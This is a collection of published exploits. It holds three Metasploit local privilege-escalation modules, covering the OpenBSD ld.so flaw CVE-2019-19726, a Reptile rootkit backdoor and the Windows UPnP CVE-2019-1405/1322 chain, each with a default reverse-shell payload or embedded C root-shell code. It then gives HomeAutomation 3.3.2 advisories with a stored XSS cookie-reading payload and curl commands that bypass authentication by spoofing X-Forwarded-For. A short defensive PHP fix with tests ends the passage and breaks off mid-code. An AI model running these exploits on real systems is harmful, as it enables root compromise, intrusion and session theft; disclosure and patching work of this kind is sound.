class MetasploitModule < Msf::Exploit::Local
  Rank = ExcellentRanking

  include Msf::Post::File
  include Msf::Exploit::EXE
  include Msf::Exploit::FileDropper

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'OpenBSD Dynamic Loader chpass Privilege Escalation',
      'Description'    => %q{
        This module exploits a vulnerability in the OpenBSD `ld.so` dynamic
        loader (CVE-2019-19726).

        The `_dl_getenv()` function fails to reset the `LD_LIBRARY_PATH`
        environment variable when set with approximately `ARG_MAX` colons.
        This can be abused to load `libutil.so` from an untrusted path,
        using `LD_LIBRARY_PATH` in combination with the `chpass` set-uid
        executable, resulting in privileged code execution.

        This module has been tested successfully on:

        OpenBSD 6.1 (amd64); and
        OpenBSD 6.6 (amd64)
      },
      'License'        => MSF_LICENSE,
      'Author'         =>
        [
          'Qualys', # Discovery and exploit
          'bcoles'  # Metasploit
        ],
      'DisclosureDate' => '2019-12-11',
      'Platform'       => %w[bsd unix], # OpenBSD
      'Arch'           => [ARCH_CMD],
      'SessionTypes'   => ['shell'],
      'References'     =>
        [
          ['CVE', '2019-19726'],
          ['EDB', '47780'],
          ['URL', 'https://blog.qualys.com/laws-of-vulnerabilities/2019/12/11/openbsd-local-privilege-escalation-vulnerability-cve-2019-19726'],
          ['URL', 'https://www.qualys.com/2019/12/11/cve-2019-19726/local-privilege-escalation-openbsd-dynamic-loader.txt'],
          ['URL', 'https://www.openwall.com/lists/oss-security/2019/12/11/9'],
          ['URL', 'https://github.com/bcoles/local-exploits/blob/master/CVE-2019-19726/openbsd-dynamic-loader-chpass'],
          ['URL', 'https://ftp.openbsd.org/pub/OpenBSD/patches/6.6/common/013_ldso.patch.sig']
        ],
      'Targets'        => [['Automatic', {}]],
      'DefaultOptions' =>
        {
          'PAYLOAD'  => 'cmd/unix/reverse',
          'WfsDelay' => 10
        },
      'DefaultTarget'  => 0))
    register_options [
      OptString.new('CHPASS_PATH', [true, 'Path to chpass', '/usr/bin/chpass'])
    ]
    register_advanced_options [
      OptBool.new('ForceExploit', [false, 'Override check result', false]),
      OptString.new('WritableDir', [true, 'A directory where we can write files', '/tmp'])
    ]
  end

  def base_dir
    datastore['WritableDir'].to_s
  end

  def chpass_path
    datastore['CHPASS_PATH']
  end

  def upload(path, data)
    print_status "Writing '#{path}' (#{data.size} bytes) ..."
    rm_f path
    write_file path, data
    register_file_for_cleanup path
  end

  def is_root?
    (cmd_exec('id -u').to_s.gsub(/[^\d]/, '') == '0')
  end

  def libutil_name
    return unless command_exists? 'readelf'

    cmd_exec('readelf -a /usr/sbin/pwd_mkdb').to_s.scan(/\[(libutil\.so\.[\d\.]+)\]/).flatten.first
  end

  def check
    patches = cmd_exec('syspatch -l').to_s
    patch = '013_ldso'
    if patches.include? patch
      vprint_error "Patch #{patch} has been installed. Target is not vulnerable."
      return CheckCode::Safe
    end
    vprint_good "Patch #{patch} is not present"

    unless command_exists? 'cc'
      vprint_error 'cc is not installed'
      return CheckCode::Safe
    end
    print_good 'cc is installed'

    CheckCode::Detected
  end

  def exploit
    unless check == CheckCode::Detected
      unless datastore['ForceExploit']
        fail_with Failure::NotVulnerable, 'Target is not vulnerable. Set ForceExploit to override.'
      end
      print_warning 'Target does not appear to be vulnerable'
    end

    if is_root?
      unless datastore['ForceExploit']
        fail_with Failure::BadConfig, 'Session already has root privileges. Set ForceExploit to override.'
      end
    end

    unless writable? base_dir
      fail_with Failure::BadConfig, "#{base_dir} is not writable"
    end

    # Qualys set-uid shared object from https://www.openwall.com/lists/oss-security/2019/12/11/9
    lib_data = <<-EOF
#include <paths.h>
#include <unistd.h>
static void __attribute__ ((constructor)) _init (void) {
    if (setuid(0) != 0) _exit(__LINE__);
    if (setgid(0) != 0) _exit(__LINE__);
    char * const argv[] = { _PATH_KSHELL, "-c", _PATH_KSHELL "; exit 1", NULL };
    execve(argv[0], argv, NULL);
    _exit(__LINE__);
}
    EOF

    libs = []
    lib = libutil_name
    if lib
      libs << lib
      print_good "Found libutil.so name: #{lib}"
    else
      libs << 'libutil.so.12.1'
      libs << 'libutil.so.13.1'
      print_warning "Could not determine libutil.so name. Using: #{libs.join(', ')}"
    end

    lib_src_path = "#{base_dir}/.#{rand_text_alphanumeric 5..10}.c"
    upload lib_src_path, lib_data

    libs.each do |lib_name|
      lib_path = "#{base_dir}/#{lib_name}"
      print_status "Compiling #{lib_path} ..."
      output = cmd_exec "cc -fpic -shared -s -o #{lib_path} #{lib_src_path} -Wall"
      register_file_for_cleanup lib_path
      unless output.blank?
        print_error output
        fail_with Failure::Unknown, "#{lib_path}.c failed to compile"
      end
    end

    # Qualys exploit from https://www.openwall.com/lists/oss-security/2019/12/11/9
    exploit_data = <<-EOF
#include <string.h>
#include <sys/param.h>
#include <sys/resource.h>
#include <unistd.h>
int main(int argc, char * const * argv) {
#define LLP "LD_LIBRARY_PATH=."
    static char llp[ARG_MAX - 128];
    memset(llp, ':', sizeof(llp)-1);
    memcpy(llp, LLP, sizeof(LLP)-1);
    char * const envp[] = { llp, "EDITOR=echo '#' >>", NULL };
#define DATA (ARG_MAX * sizeof(char *))
    const struct rlimit data = { DATA, DATA };
    if (setrlimit(RLIMIT_DATA, &data) != 0) _exit(__LINE__);
    if (argc <= 1) _exit(__LINE__);
    argv += 1;
    execve(argv[0], argv, envp);
    _exit(__LINE__);
}
    EOF

    exploit_path = "#{base_dir}/.#{rand_text_alphanumeric 5..10}"
    upload "#{exploit_path}.c", exploit_data

    print_status "Compiling #{exploit_path} ..."
    output = cmd_exec "cc -s #{exploit_path}.c -o #{exploit_path} -Wall"
    register_file_for_cleanup exploit_path
    unless output.blank?
      print_error output
      fail_with Failure::Unknown, "#{exploit_path}.c failed to compile"
    end

    payload_path = "#{base_dir}/.#{rand_text_alphanumeric 5..10}"
    upload payload_path, "#!/bin/sh\n#{payload.encoded}\n"
    chmod payload_path

    print_status 'Launching exploit...'
    output = cmd_exec("cd #{base_dir};echo '#{payload_path}&exit'|#{exploit_path} #{chpass_path}")
    output.each_line { |line| vprint_status line.chomp }
  end
end
-
Reptile Rootkit - reptile_cmd Privilege Escalation (Metasploit)
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Local
  Rank = ExcellentRanking

  include Msf::Post::File
  include Msf::Post::Linux::Priv
  include Msf::Post::Linux::System
  include Msf::Exploit::EXE
  include Msf::Exploit::FileDropper

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Reptile Rootkit reptile_cmd Privilege Escalation',
      'Description'    => %q{
        This module uses Reptile rootkit's `reptile_cmd` backdoor executable
        to gain root privileges using the `root` command.

        This module has been tested successfully with Reptile from `master`
        branch (2019-03-04) on Ubuntu 18.04.3 (x64) and Linux Mint 19 (x64).
      },
      'License'        => MSF_LICENSE,
      'Author'         =>
        [
          'f0rb1dd3n', # Reptile
          'bcoles'     # Metasploit
        ],
      'DisclosureDate' => '2018-10-29', # Reptile first stable release
      'References'     =>
        [
          ['URL', 'https://github.com/f0rb1dd3n/Reptile'],
          ['URL', 'https://github.com/f0rb1dd3n/Reptile/wiki/Usage']
        ],
      'Platform'       => ['linux'],
      'Arch'           => [ARCH_X86, ARCH_X64],
      'SessionTypes'   => ['shell', 'meterpreter'],
      'Targets'        => [['Auto', {}]],
      'Notes'          =>
        {
          'Reliability' => [ REPEATABLE_SESSION ],
          'Stability'   => [ CRASH_SAFE ]
        },
      'DefaultTarget'  => 0))
    register_options [
      OptString.new('REPTILE_CMD_PATH', [true, 'Path to reptile_cmd executable', '/reptile/reptile_cmd'])
    ]
    register_advanced_options [
      OptBool.new('ForceExploit', [false, 'Override check result', false]),
      OptString.new('WritableDir', [true, 'A directory where we can write files', '/tmp'])
    ]
  end

  def reptile_cmd_path
    datastore['REPTILE_CMD_PATH']
  end

  def base_dir
    datastore['WritableDir'].to_s
  end

  def upload(path, data)
    print_status "Writing '#{path}' (#{data.size} bytes) ..."
    rm_f path
    write_file path, data
    register_file_for_cleanup path
  end

  def upload_and_chmodx(path, data)
    upload path, data
    chmod path
  end

  def check
    unless executable? reptile_cmd_path
      vprint_error "#{reptile_cmd_path} is not executable"
      return CheckCode::Safe
    end
    vprint_good "#{reptile_cmd_path} is executable"

    res = cmd_exec("echo id|#{reptile_cmd_path} root").to_s.strip
    vprint_status "Output: #{res}"

    if res.include?('You have no power here!')
      vprint_error 'Reptile kernel module is not loaded'
      return CheckCode::Safe
    end

    unless res.include?('root')
      vprint_error 'Reptile is not installed'
      return CheckCode::Safe
    end
    vprint_good 'Reptile is installed and loaded'

    CheckCode::Vulnerable
  end

  def exploit
    unless check == CheckCode::Vulnerable
      unless datastore['ForceExploit']
        fail_with Failure::NotVulnerable, 'Target is not vulnerable. Set ForceExploit to override.'
      end
      print_warning 'Target does not appear to be vulnerable'
    end

    if is_root?
      unless datastore['ForceExploit']
        fail_with Failure::BadConfig, 'Session already has root privileges. Set ForceExploit to override.'
      end
    end

    unless writable? base_dir
      fail_with Failure::BadConfig, "#{base_dir} is not writable"
    end

    payload_name = ".#{rand_text_alphanumeric 8..12}"
    payload_path = "#{base_dir}/#{payload_name}"
    upload_and_chmodx payload_path, generate_payload_exe

    print_status 'Executing payload...'
    res = cmd_exec "echo '#{payload_path}&' | #{reptile_cmd_path} root & echo "
    vprint_line res
  end
end
-
Microsoft UPnP - Local Privilege Elevation (Metasploit)
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core/post/common'
require 'msf/core/post/file'
require 'msf/core/post/windows/priv'
require 'msf/core/post/windows/registry'
require 'msf/core/exploit/exe'

class MetasploitModule < Msf::Exploit::Local
  Rank = ExcellentRanking

  include Msf::Post::Common
  include Msf::Post::File
  include Msf::Post::Windows::Priv
  include Msf::Exploit::EXE

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Microsoft UPnP Local Privilege Elevation Vulnerability',
      'Description'    => %q(
        This exploit uses two vulnerabilities to execute a command as an
        elevated user. The first (CVE-2019-1405) uses the UPnP Device Host
        Service to elevate to NT AUTHORITY\LOCAL SERVICE The second
        (CVE-2019-1322) leverages the Update Orchestrator Service to elevate
        from NT AUTHORITY\LOCAL SERVICE to NT AUTHORITY\SYSTEM.
      ),
      'License'        => MSF_LICENSE,
      'Author'         =>
        [
          'NCC Group',   # Original discovery (https://www.nccgroup.trust/uk/)
          'hoangprod',   # PoC
          'bwatters-r7'  # msf module
        ],
      'Platform'       => ['win'],
      'SessionTypes'   => ['meterpreter'],
      'Targets'        =>
        [
          ['Windows x64', { 'Arch' => ARCH_X64 }]
        ],
      'DefaultTarget'  => 0,
      'DisclosureDate' => 'Nov 12 2019',
      'References'     =>
        [
          ['CVE', '2019-1322'],
          ['CVE', '2019-1405'],
          ['EDB', '47684'],
          ['URL', 'https://github.com/apt69/COMahawk'],
          ['URL', 'https://www.nccgroup.trust/uk/about-us/newsroom-and-events/blogs/2019/november/cve-2019-1405-and-cve-2019-1322-elevation-to-system-via-the-upnp-device-host-service-and-the-update-orchestrator-service/'],
          ['URL', 'https://fortiguard.com/threat-signal-report/3243/new-proof-of-concept-combining-cve-2019-1322-and-cve-2019-1405-developed-1']
        ],
      'DefaultOptions' =>
        {
          'DisablePayloadHandler' => false
        }
    ))
    register_options([
      OptString.new('EXPLOIT_NAME', [false, 'The filename to use for the exploit binary (%RAND% by default).', nil]),
      OptString.new('PAYLOAD_NAME', [false, 'The filename for the payload to be used on the target host (%RAND%.exe by default).', nil]),
      OptString.new('WRITABLE_DIR', [false, 'Path to write binaries (%TEMP% by default).', nil]),
      OptInt.new('EXPLOIT_TIMEOUT', [true, 'The number of seconds to wait for exploit to finish running', 60]),
      OptInt.new('EXECUTE_DELAY', [true, 'The number of seconds to delay between file upload and exploit launch', 3])
    ])
  end

  def exploit
    exploit_name = datastore['EXPLOIT_NAME'] || Rex::Text.rand_text_alpha(6..14)
    payload_name = datastore['PAYLOAD_NAME'] || Rex::Text.rand_text_alpha(6..14)
    exploit_name = "#{exploit_name}.exe" unless exploit_name.end_with?('.exe')
    payload_name = "#{payload_name}.exe" unless payload_name.end_with?('.exe')
    temp_path = datastore['WRITABLE_DIR'] || session.sys.config.getenv('TEMP')
    payload_path = "#{temp_path}\\#{payload_name}"
    exploit_path = "#{temp_path}\\#{exploit_name}"
    payload_exe = generate_payload_exe

    # Check target
    vprint_status("Checking Target")
    validate_active_host
    validate_target
    fail_with(Failure::BadConfig, "#{temp_path} does not exist on the target") unless directory?(temp_path)

    # Upload Exploit
    vprint_status("Uploading exploit to #{sysinfo['Computer']} as #{exploit_path}")
    ensure_clean_destination(exploit_path)
    exploit_bin = exploit_data('cve-2019-1322', 'CVE-2019-1322-EXE.exe')
    write_file(exploit_path, exploit_bin)
    print_status("Exploit uploaded on #{sysinfo['Computer']} to #{exploit_path}")

    # Upload Payload
    vprint_status("Uploading Payload")
    ensure_clean_destination(payload_path)
    write_file(payload_path, payload_exe)
    print_status("Payload (#{payload_exe.length} bytes) uploaded on #{sysinfo['Computer']} to #{payload_path}")
    print_warning("This exploit requires manual cleanup of the payload #{payload_path}")

    # Run Exploit
    vprint_status("Running Exploit")
    print_status("It may take a moment after the session is established for the exploit to exit safely.")
    begin
      cmd_exec('cmd.exe', "/c #{exploit_path} #{payload_path}", 60)
    rescue Rex::TimeoutError => e
      elog("#{e.class} #{e.message}\n#{e.backtrace * "\n"}")
      print_error("Caught timeout. Exploit may be taking longer or it may have failed.")
    end

    vprint_status("Cleaning up #{exploit_path}")
    ensure_clean_destination(exploit_path)
  end

  def validate_active_host
    begin
      print_status("Attempting to PrivEsc on #{sysinfo['Computer']} via session ID: #{datastore['SESSION']}")
    rescue Rex::Post::Meterpreter::RequestError => e
      elog("#{e.class} #{e.message}\n#{e.backtrace * "\n"}")
      raise Msf::Exploit::Failed, 'Could not connect to session'
    end
  end

  def validate_target
    if sysinfo['Architecture'] == ARCH_X86
      fail_with(Failure::NoTarget, 'Exploit code is 64-bit only')
    end
    sysinfo_value = sysinfo['OS']
    build_num = sysinfo_value.match(/\w+\d+\w+(\d+)/)[0].to_i
    vprint_status("Build Number = #{build_num}")
    unless sysinfo_value =~ /10/ && (build_num > 17133 && build_num < 18362)
      fail_with(Failure::NotVulnerable, 'The exploit only supports Windows 10 build versions 17133-18362')
    end
  end

  def ensure_clean_destination(path)
    return unless file?(path)

    print_status("#{path} already exists on the target. Deleting...")
    begin
      file_rm(path)
      print_status("Deleted #{path}")
    rescue Rex::Post::Meterpreter::RequestError => e
      elog("#{e.class} #{e.message}\n#{e.backtrace * "\n"}")
      print_error("Unable to delete #{path}")
    end
  end
end
-
HomeAutomation 3.3.2 - Persistent Cross-Site Scripting
# Exploit: HomeAutomation 3.3.2 - Persistent Cross-Site Scripting
# Date: 2019-12-30
# Author: LiquidWorm
# Vendor: Tom Rosenback and Daniel Malmgren
# Product web page: http://karpero.mine.nu/ha/
# Affected version: 3.3.2
# Tested on: Apache/2.4.41 (centos) OpenSSL/1.0.2k-fips
# Advisory ID: ZSL-2019-5556
# Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2019-5556.php

# HomeAutomation v3.3.2 Stored and Reflected XSS

Vendor: Tom Rosenback and Daniel Malmgren
Product web page: http://karpero.mine.nu/ha/
Affected version: 3.3.2

Summary: HomeAutomation is an open-source web interface and scheduling
solution. It was initially made for use with the Telldus TellStick, but
is now based on a plugin system and except for Tellstick it also comes
with support for Crestron, OWFS and Z-Wave (using OpenZWave). It controls
your devices (switches, dimmers, etc.) based on an advanced scheduling
system, taking into account things like measurements from various sensors.
With the houseplan view you can get a simple overview of the status of
your devices at their location in your house.

Desc: HomeAutomation suffers from multiple stored and reflected XSS
vulnerabilities when input passed via several parameters to several
scripts is not properly sanitized before being returned to the user.
This can be exploited to execute arbitrary HTML and script code in a
user's browser session in context of an affected site.

Tested on: Apache/2.4.41 (centos) OpenSSL/1.0.2k-fips
           Apache/2.4.29 (Ubuntu)
           PHP/7.4.0RC4
           PHP/7.3.11
           PHP 7.2.24-0ubuntu0.18.04.1

Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
                            @zeroscience

Advisory ID: ZSL-2019-5556
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2019-5556.php

06.11.2019

--

Reflected XSS:
--------------

https://192.168.2.113/?page=houseplan&autologin=1&msg=eyJpZCI6IiIsInRleHQiOiI8bWFycXVlZT50ZXN0PC9tYXJxdWVlPlVzZXJuYW1lIG9yIHBhc3N3b3JkIHdyb25nIiwiYWRkaXRpb25hbFRleHQiOiIiLCJ0eXBlIjoiZXJyb3IiLCJhdXRvQ2xvc2UiOmZhbHNlLCJzaG93T25seUluRGVidWciOmZhbHNlfQ==

Stored XSS:
-----------

POST /homeautomation_v3_3_2/?page=conf-macros HTTP/1.1
Host: localhost
Connection: keep-alive
Content-Length: 998
Cache-Control: max-age=0
Origin: http://localhost
Upgrade-Insecure-Requests: 1
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryq4LcgA7mbqElCW4q
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.70 Safari/537.36
Sec-Fetch-User: ?1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Referer: http://localhost/homeautomation_v3_3_2/?page=conf-macros&action=edit&id=-1
Accept-Encoding: gzip, deflate, br
Accept-Language: en-GB,en-US;q=0.9,en;q=0.8
Cookie: HomeAutomation_user=admin; HomeAutomation_hash=842427e5fc831255d7aa811b70e64957; PHPSESSID=ldcipit064rfp5l8rtcah091og

------WebKitFormBoundaryq4LcgA7mbqElCW4q
Content-Disposition: form-data; name="id"

-1
------WebKitFormBoundaryq4LcgA7mbqElCW4q
Content-Disposition: form-data; name="action"

save
------WebKitFormBoundaryq4LcgA7mbqElCW4q
Content-Disposition: form-data; name="name"

XSS
------WebKitFormBoundaryq4LcgA7mbqElCW4q
Content-Disposition: form-data; name="comment"

"><script>confirm(document.cookie)</script>
------WebKitFormBoundaryq4LcgA7mbqElCW4q
Content-Disposition: form-data; name="icon_on"; filename=""
Content-Type: application/octet-stream


------WebKitFormBoundaryq4LcgA7mbqElCW4q
Content-Disposition: form-data; name="scenario"

1
------WebKitFormBoundaryq4LcgA7mbqElCW4q
Content-Disposition: form-data; name="devices[0]"

1
------WebKitFormBoundaryq4LcgA7mbqElCW4q
Content-Disposition: form-data; name="statuses[0]"

1
------WebKitFormBoundaryq4LcgA7mbqElCW4q
Content-Disposition: form-data; name="save"

Save
------WebKitFormBoundaryq4LcgA7mbqElCW4q--
-
HomeAutomation 3.3.2 - Authentication Bypass
# Exploit: HomeAutomation 3.3.2 - Authentication Bypass
# Date: 2019-12-30
# Author: LiquidWorm
# Vendor: Tom Rosenback and Daniel Malmgren
# Product web page: http://karpero.mine.nu/ha/
# Affected version: 3.3.2
# Tested on: Apache/2.4.41 (centos) OpenSSL/1.0.2k-fips
# Advisory ID: ZSL-2019-5557
# Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2019-5557.php

HomeAutomation v3.3.2 Authentication Bypass Exploit

Vendor: Tom Rosenback and Daniel Malmgren
Product web page: http://karpero.mine.nu/ha/
Affected version: 3.3.2

Summary: HomeAutomation is an open-source web interface and scheduling
solution. It was initially made for use with the Telldus TellStick, but
is now based on a plugin system and except for Tellstick it also comes
with support for Crestron, OWFS and Z-Wave (using OpenZWave). It controls
your devices (switches, dimmers, etc.) based on an advanced scheduling
system, taking into account things like measurements from various sensors.
With the houseplan view you can get a simple overview of the status of
your devices at their location in your house.

Desc: The application suffers from an authentication bypass vulnerability
when spoofing client IP address using the X-Forwarded-For header with the
local (loopback) IP address value allowing remote control of the smart
home solution.

===============================================================================

/modules/login/login.module.php:
--------------------------------

19: if(!defined("HomeAutomationIncluded")) { die("HomeAutomation: Direct access not premitted"); }
20:
21: if($_SESSION[CFG_SESSION_KEY]["userlevel"] < 1 && $action == "default" && isIpLocal() && getFormVariable("autologin", "") == "")
22: {
23:   // if user is not logged in and action is default, user is visiting locally and autologin is NOT set, allow autologin.
24:   $action = "login";
25: }
26:
27: ?>

===============================================================================

/functions.php:
---------------

733: function isIpLocal() {
734:
735:   if(substr(getIpAddress(), 0, 4) == "127.") {
736:     return true;
737:   }
738:
739:   $isIpLocal = false;
740:
741:   $localip = $_SESSION[CFG_SESSION_KEY]["settings"]["localip"];
742:
743:   $localnets = explode(";", $localip);
744:   foreach($localnets as $localnet) {
745:     list($localnet, $localmask) = explode("/", $localnet);
746:     if($localmask == "") {
747:       $localmask = 32;
748:     }
749:     if($localmask == "" || $localmask > 32 || $localmask < 0) {
750:       $localmask = 32;
751:     }
752:
753:     // $mask = $localmask;
754:
755:     $localnet = ip2long($localnet);
756:     $localmask = ~((1 << (32-$localmask)) - 1);
757:     $remoteip = ip2long(getIpAddress());
758:     $maskedip = $remoteip & $localmask;
759:     $maskednet = $localnet & $localmask;
760:
761:     // echo "<br />localnet:";
762:     // printf('%1$32b', $localnet);
763:
764:     // echo "<br />localmask: (dec: ".$mask.")";
765:     // printf('%1$32b', $localmask);
766:
767:     // echo "<br />remoteip:";
768:     // printf('%1$32b', $remoteip);
769:
770:     // echo "<br />maskedip:";
771:     // printf('%1$32b', $maskedip);
772:
773:     // echo "<br />maskednet:";
774:     // printf('%1$32b', $maskednet);
775:
776:     if($maskedip == $maskednet) {
777:       // echo "<br />maskedip == maskednet";
778:       $isIpLocal = true;
779:       break;
780:     }
781:   }
782:   // $isIpLocal = false;
783:   return $isIpLocal;
784: }
785:
786: function getIpAddress() {
787:   return isset($_SERVER["HTTP_X_FORWARDED_FOR"]) ? $_SERVER["HTTP_X_FORWARDED_FOR"] : $_SERVER["REMOTE_ADDR"];
788: }

===============================================================================

Tested on: Apache/2.4.41 (centos) OpenSSL/1.0.2k-fips
           Apache/2.4.29 (Ubuntu)
           PHP/7.4.0RC4
           PHP/7.3.11
           PHP 7.2.24-0ubuntu0.18.04.1

Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
                            @zeroscience

Advisory ID: ZSL-2019-5557
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2019-5557.php

06.11.2019

--

PoC auth bypass and arbitrary cookie setup grepping auth'd content view:
------------------------------------------------------------------------

root@kali:~/homeautomation# curl -sk --user-agent "ZSL/0.2 (SpoofDetect 1.0)" https://192.168.2.113/index.php -H "X-Forwarded-For: 127.31.33.7" -vL --cookie "PHPSESSID=11111111110000000000666666" |grep Macros
*   Trying 192.168.2.113...
* Connected to 192.168.2.113 (192.168.2.113) port 443 (#0)
* found 173 certificates in /etc/ssl/certs/ca-certificates.crt
* found 696 certificates in /etc/ssl/certs
* ALPN, offering h2
* ALPN, offering http/1.1
* SSL connection using TLS1.2 / ECDHE_RSA_AES_128_GCM_SHA256
*        server certificate verification SKIPPED
*        server certificate status verification SKIPPED
*        common name: n28.nux.se (does not match '192.168.2.113')
*        server certificate expiration date OK
*        server certificate activation date OK
*        certificate public key: RSA
*        certificate version: #3
*        subject: CN=n28.nux.se
*        start date: Mon, 21 Oct 2019 12:18:27 GMT
*        expire date: Sun, 19 Jan 2020 12:18:27 GMT
*        issuer: C=US,O=Let's Encrypt,CN=Let's Encrypt Authority X3
*        compression: NULL
* ALPN, server accepted to use http/1.1
> GET /index.php HTTP/1.1
> Host: 192.168.2.113
> User-Agent: ZSL/0.2 (SpoofDetect 1.0)
> Accept: */*
> Cookie: PHPSESSID=11111111110000000000666666
> X-Forwarded-For: 127.31.33.7
>
< HTTP/1.1 303 See Other
< Date: Wed, 20 Nov 2019 01:06:16 GMT
< Server: Apache/2.4.41 (centos) OpenSSL/1.0.2k-fips
< X-Powered-By: PHP/7.3.11
< Expires: Thu, 19 Nov 1981 08:52:00 GMT
< Cache-Control: no-store, no-cache, must-revalidate
< Pragma: no-cache
< Strict-Transport-Security: max-age=63072000; includeSubdomains
< X-Frame-Options: DENY
< X-Content-Type-Options: nosniff
< Location: ./index.php?page=houseplan
< Content-Length: 0
< Content-Type: text/html; charset=UTF-8
<
* Connection #0 to host 192.168.2.113 left intact
* Issue another request to this URL: 'https://192.168.2.113/index.php?page=houseplan'
* Found bundle for host 192.168.2.113: 0x55c160ef7c40 [can pipeline]
* Re-using existing connection! (#0) with host 192.168.2.113
* Connected to 192.168.2.113 (192.168.2.113) port 443 (#0)
> GET /index.php?page=houseplan HTTP/1.1
> Host: 192.168.2.113
> User-Agent: ZSL/0.2 (SpoofDetect 1.0)
> Accept: */*
> Cookie: PHPSESSID=11111111110000000000666666
> X-Forwarded-For: 127.31.33.7
>
< HTTP/1.1 200 OK
< Date: Wed, 20 Nov 2019 01:06:16 GMT
< Server: Apache/2.4.41 (centos) OpenSSL/1.0.2k-fips
< X-Powered-By: PHP/7.3.11
< Expires: Thu, 19 Nov 1981 08:52:00 GMT
< Cache-Control: no-store, no-cache, must-revalidate
< Pragma: no-cache
< Strict-Transport-Security: max-age=63072000; includeSubdomains
< X-Frame-Options: DENY
< X-Content-Type-Options: nosniff
< Transfer-Encoding: chunked
< Content-Type: text/html; charset=UTF-8
<
{ [6 bytes data]
*         </li><li>| <a href="./index.php?page=macros">Macros</a>
Connection #0 to host 192.168.2.113 left intact

root@kali:~/homeautomation# curl -sk --user-agent "ZSL/0.2 (SpoofDetect 1.0)" https://192.168.2.113/index.php -vL --cookie "PHPSESSID=11111111110000000000666666" |grep Macros
*   Trying 192.168.2.113...
* Connected to 192.168.2.113 (192.168.2.113) port 443 (#0)
* found 173 certificates in /etc/ssl/certs/ca-certificates.crt
* found 696 certificates in /etc/ssl/certs
* ALPN, offering h2
* ALPN, offering http/1.1
* SSL connection using TLS1.2 / ECDHE_RSA_AES_128_GCM_SHA256
*        server certificate verification SKIPPED
*        server certificate status verification SKIPPED
*        common name: n28.nux.se (does not match '192.168.2.113')
*        server certificate expiration date OK
*        server certificate activation date OK
*        certificate public key: RSA
*        certificate version: #3
*        subject: CN=n28.nux.se
*        start date: Mon, 21 Oct 2019 12:18:27 GMT
*        expire date: Sun, 19 Jan 2020 12:18:27 GMT
*        issuer: C=US,O=Let's Encrypt,CN=Let's Encrypt Authority X3
*        compression: NULL
* ALPN, server accepted to use http/1.1
> GET /index.php HTTP/1.1
> Host: 192.168.2.113
> User-Agent: ZSL/0.2 (SpoofDetect 1.0)
> Accept: */*
> Cookie: PHPSESSID=11111111110000000000666666
>
< HTTP/1.1 200 OK
< Date: Wed, 20 Nov 2019 01:06:25 GMT
< Server: Apache/2.4.41 (centos) OpenSSL/1.0.2k-fips
< X-Powered-By: PHP/7.3.11
< Expires: Thu, 19 Nov 1981 08:52:00 GMT
< Cache-Control: no-store, no-cache, must-revalidate
< Pragma: no-cache
< Strict-Transport-Security: max-age=63072000; includeSubdomains
< X-Frame-Options: DENY
< X-Content-Type-Options: nosniff
< Transfer-Encoding: chunked
< Content-Type: text/html; charset=UTF-8
<
{ [6 bytes data]
          </li><li>| <a href="./index.php?page=macros">Macros</a>
* Connection #0 to host 192.168.2.113 left intact
root@kali:~/homeautomation#

PoC auth bypass retrieving valid Cookie:
-----------------------------------------

root@kali:~/homeautomation# $(curl -sk --user-agent "ZSL/0.2 (SpoofDetect 1.0)" https://192.168.2.113/?page=houseplan -L -H "X-Forwarded-For: 127.1.1.1" --cookie-jar cookies.txt -o /dev/null) ; echo -ne "Your cookie: " ;tail -c -27 cookies.txt
Your cookie: k4dic6crpr4d4u71tr13gvtmsv
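The root cause above is that getIpAddress() believes X-Forwarded-For from anyone, so isIpLocal() can be satisfied from the internet. The following hardened replacement is an added example, not part of the advisory or of the HomeAutomation code base: it honours the header only when the TCP peer (REMOTE_ADDR) is a configured reverse proxy, and then uses the hop that proxy appended. The function name, the $trustedProxies parameter and the addresses below are assumptions.

```php
<?php
// Added example: a trust-aware replacement for getIpAddress().
// Assumed names: getClientIpAddress(), $trustedProxies. Sample addresses are constructed.

/**
 * Return the client IP address to use for an access-control decision.
 *
 * @param array $server          the $_SERVER array (or a constructed stand-in)
 * @param array $trustedProxies  REMOTE_ADDR values allowed to set X-Forwarded-For
 */
function getClientIpAddress(array $server, array $trustedProxies = []): string
{
    $remote = $server['REMOTE_ADDR'] ?? '';

    // Direct connection, or a peer we do not trust: the header is attacker-controlled,
    // so it is ignored entirely. This branch is what closes the ZSL-2019-5557 bypass.
    if (!in_array($remote, $trustedProxies, true) || empty($server['HTTP_X_FORWARDED_FOR'])) {
        return $remote;
    }

    // Behind a trusted proxy: the proxy appends the address it saw, so the rightmost
    // entry is the one it vouches for; anything to the left is client-supplied.
    $hops = array_map('trim', explode(',', $server['HTTP_X_FORWARDED_FOR']));
    $candidate = end($hops);

    // Reject malformed values (empty element, hostnames, injected markup) rather than
    // letting them reach ip2long() in isIpLocal().
    if (filter_var($candidate, FILTER_VALIDATE_IP) === false) {
        return $remote;
    }
    return $candidate;
}

function expect(bool $ok, string $what): void
{
    if (!$ok) {
        throw new RuntimeException("check failed: $what");
    }
}

// Constructed request mirroring the advisory's PoC: an external client talks straight
// to the web server (no proxy in front) and sends "X-Forwarded-For: 127.31.33.7".
$spoofed = [
    'REMOTE_ADDR'          => '203.0.113.5',
    'HTTP_X_FORWARDED_FOR' => '127.31.33.7',
];
expect(getClientIpAddress($spoofed) === '203.0.113.5', 'spoofed header is ignored');
expect(substr(getClientIpAddress($spoofed), 0, 4) !== '127.', 'loopback autologin no longer fires');

// Same header, but arriving through a trusted reverse proxy at 10.0.0.2 which appended
// the real client address (198.51.100.9) as the last hop.
$proxied = [
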